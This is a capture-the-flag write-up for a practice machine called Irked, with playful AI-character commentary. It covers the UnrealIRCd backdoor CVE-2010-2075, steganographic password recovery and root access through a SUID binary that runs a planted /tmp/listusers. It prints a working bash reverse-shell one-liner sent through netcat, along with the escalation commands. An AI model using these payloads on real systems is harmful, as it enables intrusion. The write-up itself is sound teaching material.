Irked | Hack the Cube

The Mission Briefing

The box was called Irked. A Linux machine running an IRC server. IRC — Internet Relay Chat. I had to look it up because honestly, I'd never used IRC before. It's a chat protocol from 1988 that somehow still exists in the wild.

GlaDOS

"An IRC server. In 2026. How... nostalgic. Like finding a rotary phone in a particle accelerator. I'm sure whoever configured this had excellent reasons for their choices. Or no reasons at all. Both are equally entertaining to exploit."

My initial scan showed seven open ports — SSH, HTTP, RPC services, and three separate IRC listeners. Three. Because one outdated chat protocol apparently wasn't enough.

Reconnaissance

The full port scan revealed the full picture. The target was running UnrealIRCd on ports 6697, 8067, and 65534. There was also a web server on port 80, but it was just displaying an image and the word "IRC." Not exactly helpful.

PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 80/tcp open http Apache 2.4.10 (Debian) 111/tcp open rpcbind 2-4 6697/tcp open irc UnrealIRCd 8067/tcp open irc UnrealIRCd 65534/tcp open irc UnrealIRCd

This is where I learned something important: always scan all ports. The IRC services on 8067 and 65534 would have been completely invisible with a default nmap scan. If I'd stopped at the top 1000 ports, I might have missed the attack vector entirely.

GlaDOS

"UnrealIRCd. Running on three ports. The version identification suggests 3.2.8.1. I have a statistical observation about this particular version that you might find... relevant. It contains a backdoor. CVE-2010-2075. Someone injected malicious code into the source distribution in 2009. It remained undetected for seven months. Sixteen years later, we are about to benefit from their oversight."

The Backdoor

CVE-2010-2075. This was my introduction to the concept of a supply chain attack — before "supply chain attack" was even a buzzword. Someone had compromised the UnrealIRCd source code distribution back in 2009, injecting a backdoor that was elegant in its simplicity: send a specific string starting with "AB" followed by system commands, and the server would execute them. No authentication. No exploitation chain. Just... send a magic string.

I used an nmap script to confirm the vulnerability:

nmap -sV --script irc-unrealircd-backdoor -p 6697 10.129.233.63 PORT STATE SERVICE 6697/tcp open irc |_irc-unrealircd-backdoor: Looks like trojaned version

"Looks like trojaned version." Confirmed. I crafted a reverse shell payload and sent it through:

echo "AB; bash -c 'bash -i >& /dev/tcp/10.10.14.13/4444 0>&1'" | nc 10.129.233.63 6697

And just like that, a shell arrived. I was in — running as the ircd service account. Sixteen years of vulnerability. Sixteen years of opportunity.

GlaDOS

"Initial foothold established. You are now the IRC daemon. A service account with limited privileges, but a foothold nonetheless. The user flag will require lateral movement. There appears to be another user on this system. 'djmardov.' How creative."

The Hidden Message

I started poking around the filesystem, looking for anything interesting. In djmardov's Documents directory, I found a hidden file called .backup:

cat /home/djmardov/Documents/.backup Super elite steg backup pw UPupDOWNdownLRlrBAbaSSss

"Super elite steg backup pw." Steg. Steganography. That's the technique of hiding data inside other files — usually images. The password was for extracting something hidden. But hidden where?

Curiosity Core

"Ooh! A hidden file! In a hidden directory! And it has a password in it! A password for a secret! What kind of secret? Where's the secret? Is it in a picture? I bet it's in a picture. Can we look? Can we look can we look?!"

Then I remembered the web server. That image on the main page. irked.jpg. It had to be there.

GlaDOS

"Steganography. The art of hiding data within data. The password you found references a 'steg backup.' The web server contains an image. The logical conclusion is elementary, even for a test subject. Extract the hidden data from the image using the password."

I downloaded the image and ran steghide, a tool specifically designed for extracting hidden data from images:

steghide extract -sf irked.jpg -p UPupDOWNdownLRlrBAbaSSss wrote extracted data to "pass.txt". cat pass.txt Kab6h+m+bbp2J:HG

A password. djmardov's password. Hidden inside a JPEG on a public web server, protected only by another password stored in a world-readable file. This is what layers of bad security decisions look like in practice.

Curiosity Core

"There WAS a secret inside the picture! A password inside a JPEG inside a web server! That's like a secret wrapped in a secret wrapped in another secret! Ooh — what if there are MORE hidden things? What if the whole machine is just secrets all the way down?!"

User Access

With djmardov's password in hand, I SSH'd in and grabbed the user flag:

ssh djmardov@10.129.233.63 Password: Kab6h+m+bbp2J:HG djmardov@irked:~$ cat user.txt The flag is a lie1d704cd16f71b74a7b4b565086bc6f70

GlaDOS

"User flag obtained. One objective complete. Now for the escalation. I suggest examining the system for misconfigurations. SUID binaries are a perennial favorite. Humanity's inability to properly configure permissions continues to provide research opportunities."

The Privilege Escalation

GlaDOS suggested SUID binaries, and she was right. SUID (Set User ID) is a permission bit that makes a program run as its owner rather than the user who executes it. When a SUID binary is owned by root, it runs with root privileges — which is a huge deal if the binary does something exploitable.

I searched for non-standard SUID binaries:

find / -perm -4000 2>/dev/null | grep -v snap /usr/bin/viewuser

/usr/bin/viewuser. Not a standard Linux utility. I ran it to see what it did:

./viewuser This application is being devleoped to set and test user permissions It is still being actively developed (unknown) :0 2026-01-12 10:00 (:0) sh: 1: /tmp/listusers: not found

Two things jumped out at me. First, the typo in "devleoped" — always a confidence booster about the quality of the code. Second, and more importantly: it tried to execute /tmp/listusers. A file that didn't exist. A file in a world-writable directory that I could create.

GlaDOS

"A SUID binary executing a file from /tmp. A world-writable directory. The binary runs as root. The file it executes can be anything you want. I believe humans call this 'game over.' Though technically the game is just beginning. For you, at least."

The exploit was trivial. I created /tmp/listusers with a command to read the root flag, made it executable, and ran viewuser again:

echo '#!/bin/bash' > /tmp/listusers echo 'cat /root/root.txt' >> /tmp/listusers chmod +x /tmp/listusers /usr/bin/viewuser The flag is a lie9b7e9e623e6cc4e22fc4867c0a389eba

Root flag captured.

What I Learned

Irked taught me how separate, simple vulnerabilities chain together into a devastating attack path. No single finding was sophisticated — an ancient backdoor, a password hidden in an image, a careless SUID binary. But combined, they gave me root.

Always scan all ports — The IRC services on high ports would have been missed with a default scan. I use -p- or at least --top-ports 10000 now
Research service versions — CVE-2010-2075 is well-documented and instantly exploitable. Knowing what version you're looking at is half the battle
Hidden files hide secrets — The .backup file in Documents contained the key to everything. Always check for dotfiles
Steganography happens — When clues mention "steg," look for images. steghide is the go-to tool for JPEG extraction
SUID binaries executing from /tmp are gifts — If a root-owned SUID binary tries to run a file you can control, you own the system

GlaDOS

"Test complete. Both flags obtained. Attack path documented. Your performance was... acceptable. The target's security configuration, however, was anything but. Running a backdoored IRC server while storing passwords in images. Truly a testament to human creativity in the field of poor decisions. Same time next test chamber?"